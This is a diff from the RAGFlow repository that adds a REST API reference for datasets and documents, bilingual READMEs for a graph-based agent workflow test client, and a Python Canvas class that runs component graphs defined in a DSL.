|
||||
docker compose up
|
||||
```
|
||||
|
||||
#### 4.16 `hint : 102 Fail to access model Connection error`
|
||||
#### 4.15 `hint : 102 Fail to access model Connection error`
|
||||
|
||||

|
||||
|
||||
@ -345,7 +341,7 @@ This exception occurs when starting up the RAGFlow server. Try the following:
|
||||
2. Do not forget to append **/v1/** to **http://IP:port**:
|
||||
**http://IP:port/v1/**
|
||||
|
||||
#### 4.17 `FileNotFoundError: [Errno 2] No such file or directory`
|
||||
#### 4.16 `FileNotFoundError: [Errno 2] No such file or directory`
|
||||
|
||||
1. Check if the status of your minio container is healthy:
|
||||
```bash
|
||||
|
||||
535
docs/references/ragflow_api.md
Normal file
535
docs/references/ragflow_api.md
Normal file
@ -0,0 +1,535 @@
|
||||
---
|
||||
sidebar_class_name: hidden
|
||||
---
|
||||
|
||||
# API reference
|
||||
|
||||
RAGFlow offers RESTful APIs for you to integrate its capabilities into third-party applications.
|
||||
|
||||
## Base URL
|
||||
```
|
||||
http://<host_address>/api/v1/
|
||||
```
|
||||
|
||||
## Dataset URL
|
||||
```
|
||||
http://<host_address>/api/v1/dataset
|
||||
```
|
||||
|
||||
## Authorization
|
||||
|
||||
All of RAGFlow's RESTFul APIs use API key for authorization, so keep it safe and do not expose it to the front end.
|
||||
Put your API key in the request header.
|
||||
|
||||
```buildoutcfg
|
||||
Authorization: Bearer {API_KEY}
|
||||
```
|
||||
|
||||
To get your API key:
|
||||
|
||||
1. In RAGFlow, click **Chat** tab in the middle top of the page.
|
||||
2. Hover over the corresponding dialogue **>** **Chat Bot API** to show the chatbot API configuration page.
|
||||
3. Click **Api Key** **>** **Create new key** to create your API key.
|
||||
4. Copy and keep your API key safe.
|
||||
|
||||
## Create dataset
|
||||
|
||||
This method creates (news) a dataset for a specific user.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|--------|-------------|
|
||||
| POST | `/dataset` |
|
||||
|
||||
:::note
|
||||
You are *required* to save the `data.dataset_id` value returned in the response data, which is the session ID for all upcoming conversations.
|
||||
:::
|
||||
|
||||
#### Request parameter
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|----------------|--------|----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
|
||||
| `dataset_name` | string | Yes | The unique identifier assigned to each newly created dataset. `dataset_name` must be less than 2 ** 10 characters and cannot be empty. The following character sets are supported: <br />- 26 lowercase English letters (a-z)<br />- 26 uppercase English letters (A-Z)<br />- 10 digits (0-9)<br />- "_", "-", "." |
|
||||
|
||||
### Response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": {
|
||||
"dataset_name": "kb1",
|
||||
"dataset_id": "375e8ada2d3c11ef98f93043d7ee537e"
|
||||
},
|
||||
"message": "success"
|
||||
}
|
||||
```
|
||||
|
||||
## Get dataset list
|
||||
|
||||
This method lists the created datasets for a specific user.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|----------|-------------|
|
||||
| GET | `/dataset` |
|
||||
|
||||
### Response
|
||||
|
||||
#### Response parameter
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": [
|
||||
{
|
||||
"avatar": null,
|
||||
"chunk_num": 0,
|
||||
"create_date": "Mon, 17 Jun 2024 16:00:05 GMT",
|
||||
"create_time": 1718611205876,
|
||||
"created_by": "b48110a0286411ef994a3043d7ee537e",
|
||||
"description": null,
|
||||
"doc_num": 0,
|
||||
"embd_id": "BAAI/bge-large-zh-v1.5",
|
||||
"id": "9bd6424a2c7f11ef81b83043d7ee537e",
|
||||
"language": "Chinese",
|
||||
"name": "dataset3(23)",
|
||||
"parser_config": {
|
||||
"pages": [
|
||||
[
|
||||
1,
|
||||
1000000
|
||||
]
|
||||
]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"permission": "me",
|
||||
"similarity_threshold": 0.2,
|
||||
"status": "1",
|
||||
"tenant_id": "b48110a0286411ef994a3043d7ee537e",
|
||||
"token_num": 0,
|
||||
"update_date": "Mon, 17 Jun 2024 16:00:05 GMT",
|
||||
"update_time": 1718611205876,
|
||||
"vector_similarity_weight": 0.3
|
||||
}
|
||||
],
|
||||
"message": "List datasets successfully!"
|
||||
}
|
||||
```
|
||||
|
||||
## Delete dataset
|
||||
|
||||
This method deletes a dataset for a specific user.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|--------|-------------------------|
|
||||
| DELETE | `/dataset/{dataset_id}` |
|
||||
|
||||
#### Request parameter
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|--------------|--------|----------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|
|
||||
| `dataset_id` | string | Yes | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
|
||||
|
||||
### Response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"message": "Remove dataset: 9cefaefc2e2611ef916b3043d7ee537e successfully"
|
||||
}
|
||||
```
|
||||
|
||||
### Get the details of the specific dataset
|
||||
|
||||
This method gets the details of the specific dataset.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|----------|-------------------------|
|
||||
| GET | `/dataset/{dataset_id}` |
|
||||
|
||||
#### Request parameter
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|--------------|--------|----------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|
|
||||
| `dataset_id` | string | Yes | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
|
||||
|
||||
### Response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": {
|
||||
"avatar": null,
|
||||
"chunk_num": 0,
|
||||
"description": null,
|
||||
"doc_num": 0,
|
||||
"embd_id": "BAAI/bge-large-zh-v1.5",
|
||||
"id": "060323022e3511efa8263043d7ee537e",
|
||||
"language": "Chinese",
|
||||
"name": "test(1)",
|
||||
"parser_config":
|
||||
{
|
||||
"pages": [[1, 1000000]]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"permission": "me",
|
||||
"token_num": 0
|
||||
},
|
||||
"message": "success"
|
||||
}
|
||||
```
|
||||
|
||||
### Update the details of the specific dataset
|
||||
|
||||
This method updates the details of the specific dataset.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|--------|-------------------------|
|
||||
| PUT | `/dataset/{dataset_id}` |
|
||||
|
||||
#### Request parameter
|
||||
|
||||
You are required to input at least one parameter.
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|----------------------|--------|----------|-----------------------------------------------------------------------|
|
||||
| `name` | string | No | The name of the knowledge base, from which you get the document list. |
|
||||
| `description` | string | No | The description of the knowledge base. |
|
||||
| `permission` | string | No | The permission for the knowledge base, default:me. |
|
||||
| `language` | string | No | The language of the knowledge base. |
|
||||
| `chunk_method` | string | No | The chunk method of the knowledge base. |
|
||||
| `embedding_model_id` | string | No | The embedding model id of the knowledge base. |
|
||||
| `photo` | string | No | The photo of the knowledge base. |
|
||||
| `layout_recognize` | bool | No | The layout recognize of the knowledge base. |
|
||||
| `token_num` | int | No | The token number of the knowledge base. |
|
||||
| `id` | string | No | The id of the knowledge base. |
|
||||
|
||||
### Response
|
||||
|
||||
### Successful response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": {
|
||||
"avatar": null,
|
||||
"chunk_num": 0,
|
||||
"create_date": "Wed, 19 Jun 2024 20:33:34 GMT",
|
||||
"create_time": 1718800414518,
|
||||
"created_by": "b48110a0286411ef994a3043d7ee537e",
|
||||
"description": "new_description1",
|
||||
"doc_num": 0,
|
||||
"embd_id": "BAAI/bge-large-zh-v1.5",
|
||||
"id": "24f9f17a2e3811ef820e3043d7ee537e",
|
||||
"language": "English",
|
||||
"name": "new_name",
|
||||
"parser_config":
|
||||
{
|
||||
"pages": [[1, 1000000]]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"permission": "me",
|
||||
"similarity_threshold": 0.2,
|
||||
"status": "1",
|
||||
"tenant_id": "b48110a0286411ef994a3043d7ee537e",
|
||||
"token_num": 0,
|
||||
"update_date": "Wed, 19 Jun 2024 20:33:34 GMT",
|
||||
"update_time": 1718800414529,
|
||||
"vector_similarity_weight": 0.3
|
||||
},
|
||||
"message": "success"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for the operating error
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 103,
|
||||
"message": "Only the owner of knowledgebase is authorized for this operation!"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for no parameter
|
||||
```json
|
||||
{
|
||||
"code": 102,
|
||||
"message": "Please input at least one parameter that you want to update!"
|
||||
}
|
||||
```
|
||||
|
||||
------------------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
## Upload documents
|
||||
|
||||
This method uploads documents for a specific user.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|--------|-----------------------------------|
|
||||
| POST | `/dataset/{dataset_id}/documents` |
|
||||
|
||||
|
||||
#### Request parameter
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|--------------|--------|----------|------------------------------------------------------------|
|
||||
| `dataset_id` | string | Yes | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
|
||||
|
||||
### Response
|
||||
|
||||
### Successful response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": [
|
||||
{
|
||||
"created_by": "b48110a0286411ef994a3043d7ee537e",
|
||||
"id": "859584a0379211efb1a23043d7ee537e",
|
||||
"kb_id": "8591349a379211ef92213043d7ee537e",
|
||||
"location": "test.txt",
|
||||
"name": "test.txt",
|
||||
"parser_config": {
|
||||
"pages": [
|
||||
[1, 1000000]
|
||||
]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"size": 0,
|
||||
"thumbnail": null,
|
||||
"type": "doc"
|
||||
},
|
||||
{
|
||||
"created_by": "b48110a0286411ef994a3043d7ee537e",
|
||||
"id": "8596f18c379211efb1a23043d7ee537e",
|
||||
"kb_id": "8591349a379211ef92213043d7ee537e",
|
||||
"location": "test1.txt",
|
||||
"name": "test1.txt",
|
||||
"parser_config": {
|
||||
"pages": [
|
||||
[1, 1000000]
|
||||
]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"size": 0,
|
||||
"thumbnail": null,
|
||||
"type": "doc"
|
||||
}
|
||||
],
|
||||
"message": "success"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for nonexistent files
|
||||
|
||||
```json
|
||||
{
|
||||
"code": "RetCode.DATA_ERROR",
|
||||
"message": "The file test_data/imagination.txt does not exist"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for nonexistent dataset
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 102,
|
||||
"message": "Can't find this dataset"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for the number of files exceeding the limit
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 102,
|
||||
"message": "You try to upload 512 files, which exceeds the maximum number of uploading files: 256"
|
||||
}
|
||||
```
|
||||
### Response for uploading without files.
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 101,
|
||||
"message": "None is not string."
|
||||
}
|
||||
```
|
||||
|
||||
## Delete documents
|
||||
|
||||
This method deletes documents for a specific user.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|--------|-----------------------------------|
|
||||
| DELETE | `/dataset/{dataset_id}/documents/{document_id}` |
|
||||
|
||||
|
||||
#### Request parameter
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|---------------|--------|----------|-------------------------------------------------------------------------------------|
|
||||
| `dataset_id` | string | Yes | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
|
||||
| `document_id` | string | Yes | The ID of the document. Call ['GET' /document](#list-documents) to retrieve the ID. |
|
||||
|
||||
### Response
|
||||
|
||||
### Successful response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": true,
|
||||
"message": "success"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for deleting a document that does not exist
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 102,
|
||||
"message": "Document 111 not found!"
|
||||
}
|
||||
```
|
||||
### Response for deleting documents from a non-existent dataset
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 101,
|
||||
"message": "The document f7aba1ec379b11ef8e853043d7ee537e is not in the dataset: 000, but in the dataset: f7a7ccf2379b11ef83223043d7ee537e."
|
||||
}
|
||||
```
|
||||
|
||||
## List documents
|
||||
|
||||
This method deletes documents for a specific user.
|
||||
|
||||
### Request
|
||||
|
||||
#### Request URI
|
||||
|
||||
| Method | Request URI |
|
||||
|--------|-----------------------------------|
|
||||
| GET | `/dataset/{dataset_id}/documents` |
|
||||
|
||||
|
||||
#### Request parameter
|
||||
|
||||
| Name | Type | Required | Description |
|
||||
|--------------|--------|----------|------------------------------------------------------------------------------------------------------------|
|
||||
| `dataset_id` | string | Yes | The ID of the dataset. Call ['GET' /dataset](#create-dataset) to retrieve the ID. |
|
||||
| `offset` | int | No | The start of the listed documents. Default: 0 |
|
||||
| `count` | int | No | The total count of the listed documents. Default: -1, meaning all the later part of documents from the start. |
|
||||
| `order_by` | string | No | Default: `create_time` |
|
||||
| `descend` | bool | No | The order of listing documents. Default: True |
|
||||
| `keywords` | string | No | The searching keywords of listing documents. Default: "" |
|
||||
|
||||
### Response
|
||||
|
||||
### Successful Response
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 0,
|
||||
"data": {
|
||||
"docs": [
|
||||
{
|
||||
"chunk_num": 0,
|
||||
"create_date": "Mon, 01 Jul 2024 19:24:10 GMT",
|
||||
"create_time": 1719833050046,
|
||||
"created_by": "b48110a0286411ef994a3043d7ee537e",
|
||||
"id": "6fb6f588379c11ef87023043d7ee537e",
|
||||
"kb_id": "6fb1c9e6379c11efa3523043d7ee537e",
|
||||
"location": "empty.txt",
|
||||
"name": "empty.txt",
|
||||
"parser_config": {
|
||||
"pages": [
|
||||
[1, 1000000]
|
||||
]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"process_begin_at": null,
|
||||
"process_duation": 0.0,
|
||||
"progress": 0.0,
|
||||
"progress_msg": "",
|
||||
"run": "0",
|
||||
"size": 0,
|
||||
"source_type": "local",
|
||||
"status": "1",
|
||||
"thumbnail": null,
|
||||
"token_num": 0,
|
||||
"type": "doc",
|
||||
"update_date": "Mon, 01 Jul 2024 19:24:10 GMT",
|
||||
"update_time": 1719833050046
|
||||
},
|
||||
{
|
||||
"chunk_num": 0,
|
||||
"create_date": "Mon, 01 Jul 2024 19:24:10 GMT",
|
||||
"create_time": 1719833050037,
|
||||
"created_by": "b48110a0286411ef994a3043d7ee537e",
|
||||
"id": "6fb59c60379c11ef87023043d7ee537e",
|
||||
"kb_id": "6fb1c9e6379c11efa3523043d7ee537e",
|
||||
"location": "test.txt",
|
||||
"name": "test.txt",
|
||||
"parser_config": {
|
||||
"pages": [
|
||||
[1, 1000000]
|
||||
]
|
||||
},
|
||||
"parser_id": "naive",
|
||||
"process_begin_at": null,
|
||||
"process_duation": 0.0,
|
||||
"progress": 0.0,
|
||||
"progress_msg": "",
|
||||
"run": "0",
|
||||
"size": 0,
|
||||
"source_type": "local",
|
||||
"status": "1",
|
||||
"thumbnail": null,
|
||||
"token_num": 0,
|
||||
"type": "doc",
|
||||
"update_date": "Mon, 01 Jul 2024 19:24:10 GMT",
|
||||
"update_time": 1719833050037
|
||||
}
|
||||
],
|
||||
"total": 2
|
||||
},
|
||||
"message": "success"
|
||||
}
|
||||
```
|
||||
|
||||
### Response for listing documents with IndexError
|
||||
|
||||
```json
|
||||
{
|
||||
"code": 100,
|
||||
"message": "IndexError('Offset is out of the valid range.')"
|
||||
}
|
||||
```
|
||||
|
||||
45
graph/README.md
Normal file
45
graph/README.md
Normal file
@ -0,0 +1,45 @@
|
||||
English | [简体中文](./README_zh.md)
|
||||
|
||||
# *Graph*
|
||||
|
||||
|
||||
## Introduction
|
||||
|
||||
*Graph* is a mathematical concept which is composed of nodes and edges.
|
||||
It is used to compose a complex work flow or agent.
|
||||
And this graph is beyond the DAG that we can use circles to describe our agent or work flow.
|
||||
Under this folder, we propose a test tool ./test/client.py which can test the DSLs such as json files in folder ./test/dsl_examples.
|
||||
Please use this client at the same folder you start RAGFlow. If it's run by Docker, please go into the container before running the client.
|
||||
Otherwise, correct configurations in conf/service_conf.yaml is essential.
|
||||
|
||||
```bash
|
||||
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
|
||||
usage: client.py [-h] -s DSL -t TENANT_ID -m
|
||||
|
||||
options:
|
||||
-h, --help show this help message and exit
|
||||
-s DSL, --dsl DSL input dsl
|
||||
-t TENANT_ID, --tenant_id TENANT_ID
|
||||
Tenant ID
|
||||
-m, --stream Stream output
|
||||
```
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
|
||||
</div>
|
||||
|
||||
|
||||
## How to gain a TENANT_ID in command line?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
|
||||
</div>
|
||||
💡 We plan to display it here in the near future.
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
|
||||
</div>
|
||||
|
||||
|
||||
## How to set 'kb_ids' for component 'Retrieval' in DSL?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
|
||||
</div>
|
||||
|
||||
46
graph/README_zh.md
Normal file
46
graph/README_zh.md
Normal file
@ -0,0 +1,46 @@
|
||||
[English](./README.md) | 简体中文
|
||||
|
||||
# *Graph*
|
||||
|
||||
|
||||
## 简介
|
||||
|
||||
"Graph"是一个由节点和边组成的数学概念。
|
||||
它被用来构建复杂的工作流或代理。
|
||||
这个图超越了有向无环图(DAG),我们可以使用循环来描述我们的代理或工作流。
|
||||
在这个文件夹下,我们提出了一个测试工具 ./test/client.py,
|
||||
它可以测试像文件夹./test/dsl_examples下一样的DSL文件。
|
||||
请在启动 RAGFlow 的同一文件夹中使用此客户端。如果它是通过 Docker 运行的,请在运行客户端之前进入容器。
|
||||
否则,正确配置 conf/service_conf.yaml 文件是必不可少的。
|
||||
|
||||
```bash
|
||||
PYTHONPATH=path/to/ragflow python graph/test/client.py -h
|
||||
usage: client.py [-h] -s DSL -t TENANT_ID -m
|
||||
|
||||
options:
|
||||
-h, --help show this help message and exit
|
||||
-s DSL, --dsl DSL input dsl
|
||||
-t TENANT_ID, --tenant_id TENANT_ID
|
||||
Tenant ID
|
||||
-m, --stream Stream output
|
||||
```
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 命令行中的TENANT_ID如何获得?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
|
||||
</div>
|
||||
💡 后面会展示在这里:
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
|
||||
</div>
|
||||
|
||||
|
||||
## DSL里面的Retrieval组件的kb_ids怎么填?
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
|
||||
</div>
|
||||
|
||||
0
graph/__init__.py
Normal file
0
graph/__init__.py
Normal file
295
graph/canvas.py
Normal file
295
graph/canvas.py
Normal file
@ -0,0 +1,295 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import importlib
|
||||
import json
|
||||
import traceback
|
||||
from abc import ABC
|
||||
from copy import deepcopy
|
||||
from functools import partial
|
||||
|
||||
import pandas as pd
|
||||
|
||||
from graph.component import component_class
|
||||
from graph.component.base import ComponentBase
|
||||
from graph.settings import flow_logger, DEBUG
|
||||
|
||||
|
||||
class Canvas(ABC):
|
||||
"""
|
||||
dsl = {
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {},
|
||||
},
|
||||
"downstream": ["answer_0"],
|
||||
"upstream": [],
|
||||
},
|
||||
"answer_0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval_0"],
|
||||
"upstream": ["begin", "generate_0"],
|
||||
},
|
||||
"retrieval_0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate_0"],
|
||||
"upstream": ["answer_0"],
|
||||
},
|
||||
"generate_0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["answer_0"],
|
||||
"upstream": ["retrieval_0"],
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": [],
|
||||
"path": [["begin"]],
|
||||
"answer": []
|
||||
}
|
||||
"""
|
||||
|
||||
def __init__(self, dsl: str, tenant_id=None):
|
||||
self.path = []
|
||||
self.history = []
|
||||
self.messages = []
|
||||
self.answer = []
|
||||
self.components = {}
|
||||
self.dsl = json.loads(dsl) if dsl else {
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj": {
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": [],
|
||||
"upstream": []
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": [],
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
self._tenant_id = tenant_id
|
||||
self._embed_id = ""
|
||||
self.load()
|
||||
|
||||
def load(self):
|
||||
self.components = self.dsl["components"]
|
||||
cpn_nms = set([])
|
||||
for k, cpn in self.components.items():
|
||||
cpn_nms.add(cpn["obj"]["component_name"])
|
||||
|
||||
assert "Begin" in cpn_nms, "There have to be an 'Begin' component."
|
||||
assert "Answer" in cpn_nms, "There have to be an 'Answer' component."
|
||||
|
||||
for k, cpn in self.components.items():
|
||||
cpn_nms.add(cpn["obj"]["component_name"])
|
||||
param = component_class(cpn["obj"]["component_name"] + "Param")()
|
||||
param.update(cpn["obj"]["params"])
|
||||
param.check()
|
||||
cpn["obj"] = component_class(cpn["obj"]["component_name"])(self, k, param)
|
||||
if cpn["obj"].component_name == "Categorize":
|
||||
for _, desc in param.category_description.items():
|
||||
if desc["to"] not in cpn["downstream"]:
|
||||
cpn["downstream"].append(desc["to"])
|
||||
|
||||
self.path = self.dsl["path"]
|
||||
self.history = self.dsl["history"]
|
||||
self.messages = self.dsl["messages"]
|
||||
self.answer = self.dsl["answer"]
|
||||
self.reference = self.dsl["reference"]
|
||||
self._embed_id = self.dsl.get("embed_id", "")
|
||||
|
||||
def __str__(self):
|
||||
self.dsl["path"] = self.path
|
||||
self.dsl["history"] = self.history
|
||||
self.dsl["messages"] = self.messages
|
||||
self.dsl["answer"] = self.answer
|
||||
self.dsl["reference"] = self.reference
|
||||
self.dsl["embed_id"] = self._embed_id
|
||||
dsl = {
|
||||
"components": {}
|
||||
}
|
||||
for k in self.dsl.keys():
|
||||
if k in ["components"]:continue
|
||||
dsl[k] = deepcopy(self.dsl[k])
|
||||
|
||||
for k, cpn in self.components.items():
|
||||
if k not in dsl["components"]:
|
||||
dsl["components"][k] = {}
|
||||
for c in cpn.keys():
|
||||
if c == "obj":
|
||||
dsl["components"][k][c] = json.loads(str(cpn["obj"]))
|
||||
continue
|
||||
dsl["components"][k][c] = deepcopy(cpn[c])
|
||||
return json.dumps(dsl, ensure_ascii=False)
|
||||
|
||||
def reset(self):
|
||||
self.path = []
|
||||
self.history = []
|
||||
self.messages = []
|
||||
self.answer = []
|
||||
self.reference = []
|
||||
for k, cpn in self.components.items():
|
||||
self.components[k]["obj"].reset()
|
||||
self._embed_id = ""
|
||||
|
||||
def run(self, **kwargs):
|
||||
ans = ""
|
||||
if self.answer:
|
||||
cpn_id = self.answer[0]
|
||||
self.answer.pop(0)
|
||||
try:
|
||||
ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
|
||||
except Exception as e:
|
||||
ans = ComponentBase.be_output(str(e))
|
||||
self.path[-1].append(cpn_id)
|
||||
if kwargs.get("stream"):
|
||||
assert isinstance(ans, partial)
|
||||
return ans
|
||||
self.history.append(("assistant", ans.to_dict("records")))
|
||||
return ans
|
||||
|
||||
if not self.path:
|
||||
self.components["begin"]["obj"].run(self.history, **kwargs)
|
||||
self.path.append(["begin"])
|
||||
|
||||
self.path.append([])
|
||||
ran = -1
|
||||
|
||||
def prepare2run(cpns):
|
||||
nonlocal ran, ans
|
||||
for c in cpns:
|
||||
cpn = self.components[c]["obj"]
|
||||
if cpn.component_name == "Answer":
|
||||
self.answer.append(c)
|
||||
else:
|
||||
if DEBUG: print("RUN: ", c)
|
||||
ans = cpn.run(self.history, **kwargs)
|
||||
self.path[-1].append(c)
|
||||
ran += 1
|
||||
|
||||
prepare2run(self.components[self.path[-2][-1]]["downstream"])
|
||||
while 0 <= ran < len(self.path[-1]):
|
||||
if DEBUG: print(ran, self.path)
|
||||
cpn_id = self.path[-1][ran]
|
||||
cpn = self.get_component(cpn_id)
|
||||
if not cpn["downstream"]: break
|
||||
|
||||
loop = self._find_loop()
|
||||
if loop: raise OverflowError(f"Too much loops: {loop}")
|
||||
|
||||
if cpn["obj"].component_name.lower() in ["switch", "categorize", "relevant"]:
|
||||
switch_out = cpn["obj"].output()[1].iloc[0, 0]
|
||||
assert switch_out in self.components, \
|
||||
"{}'s output: {} not valid.".format(cpn_id, switch_out)
|
||||
try:
|
||||
prepare2run([switch_out])
|
||||
except Exception as e:
|
||||
for p in [c for p in self.path for c in p][::-1]:
|
||||
if p.lower().find("answer") >= 0:
|
||||
self.get_component(p)["obj"].set_exception(e)
|
||||
prepare2run([p])
|
||||
break
|
||||
traceback.print_exc()
|
||||
continue
|
||||
|
||||
try:
|
||||
prepare2run(cpn["downstream"])
|
||||
except Exception as e:
|
||||
for p in [c for p in self.path for c in p][::-1]:
|
||||
if p.lower().find("answer") >= 0:
|
||||
self.get_component(p)["obj"].set_exception(e)
|
||||
prepare2run([p])
|
||||
break
|
||||
traceback.print_exc()
|
||||
|
||||
if self.answer:
|
||||
cpn_id = self.answer[0]
|
||||
self.answer.pop(0)
|
||||
ans = self.components[cpn_id]["obj"].run(self.history, **kwargs)
|
||||
self.path[-1].append(cpn_id)
|
||||
if kwargs.get("stream"):
|
||||
assert isinstance(ans, partial)
|
||||
return ans
|
||||
|
||||
self.history.append(("assistant", ans.to_dict("records")))
|
||||
|
||||
return ans
|
||||
|
||||
def get_component(self, cpn_id):
|
||||
return self.components[cpn_id]
|
||||
|
||||
def get_tenant_id(self):
|
||||
return self._tenant_id
|
||||
|
||||
def get_history(self, window_size):
|
||||
convs = []
|
||||
for role, obj in self.history[window_size * -2:]:
|
||||
convs.append({"role": role, "content": (obj if role == "user" else
|
||||
'\n'.join(pd.DataFrame(obj)['content']))})
|
||||
return convs
|
||||
|
||||
def add_user_input(self, question):
|
||||
self.history.append(("user", question))
|
||||
|
||||
def set_embedding_model(self, embed_id):
|
||||
self._embed_id = embed_id
|
||||
|
||||
def get_embedding_model(self):
|
||||
return self._embed_id
|
||||
|
||||
def _find_loop(self, max_loops=2):
|
||||
path = self.path[-1][::-1]
|
||||
if len(path) < 2: return False
|
||||
|
||||
for i in range(len(path)):
|
||||
if path[i].lower().find("answer") >= 0:
|
||||
path = path[:i]
|
||||
break
|
||||
|
||||
if len(path) < 2: return False
|
||||
|
||||
for l in range(2, len(path) // 2):
|
||||
pat = ",".join(path[0:l])
|
||||
path_str = ",".join(path)
|
||||
if len(pat) >= len(path_str): return False
|
||||
loop = max_loops
|
||||
while path_str.find(pat) == 0 and loop >= 0:
|
||||
loop -= 1
|
||||
if len(pat)+1 >= len(path_str):
|
||||
return False
|
||||
path_str = path_str[len(pat)+1:]
|
||||
if loop < 0:
|
||||
pat = " => ".join([p.split(":")[0] for p in path[0:l]])
|
||||
return pat + " => " + pat
|
||||
|
||||
return False
|
||||
19
graph/component/__init__.py
Normal file
19
